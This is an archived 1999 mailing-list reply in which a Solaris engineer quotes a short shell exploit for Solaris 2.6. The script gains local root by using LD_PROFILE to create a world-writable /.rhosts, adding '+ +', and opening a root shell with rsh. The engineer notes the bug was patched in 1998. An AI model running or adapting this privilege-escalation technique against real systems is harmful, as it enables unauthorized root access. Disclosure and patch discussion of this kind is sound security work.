Re: LD_PROFILE local root exploit for solaris 2.6

From: Darren Moffat - Solaris Sustaining Engineering (darren.moffatat_private)
Date: Fri Sep 24 1999 - 02:00:46 PDT

Next message: Pavel Kankovsky: "Re: LD_PROFILE local root exploit for solaris 2.6"

Previous message: Marc SPARC: "[Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Maybe in reply to: Steve Mynott: "LD_PROFILE local root exploit for solaris 2.6"
Next in thread: Pavel Kankovsky: "Re: LD_PROFILE local root exploit for solaris 2.6"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

>works on solaris 2.6 sparc anyway...
>
>#! /bin/ksh
>#  LD_PROFILE local root exploit for solaris
>#  steveat_private 19990922
>umask 000
>ln -s /.rhosts /var/tmp/ps.profile
>export LD_PROFILE=/usr/bin/ps
>/usr/bin/ps
>echo + + >  /.rhosts
>rsh -l root localhost csh -i


This was bug# 4150646/1241843 which is fixed in patch 105490-05 (or higher),
which was released over 1 year ago (Sep/10/98)!

Patch 105490-07 is in the current recommened patch set for Solaris 2.6,
so it is publicly available.

I strongly recommend that people apply the latest recommended and security
patch sets when testing out security exploits.  That way you won't send
out information about exploits which have been long fixed and needlessly
panic people.

--
Darren J Moffat

Next message: Pavel Kankovsky: "Re: LD_PROFILE local root exploit for solaris 2.6"
Previous message: Marc SPARC: "[Fwd: Truth about ssh 1.2.27 vulnerabiltiy]"
Maybe in reply to: Steve Mynott: "LD_PROFILE local root exploit for solaris 2.6"
Next in thread: Pavel Kankovsky: "Re: LD_PROFILE local root exploit for solaris 2.6"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:05:12 PDT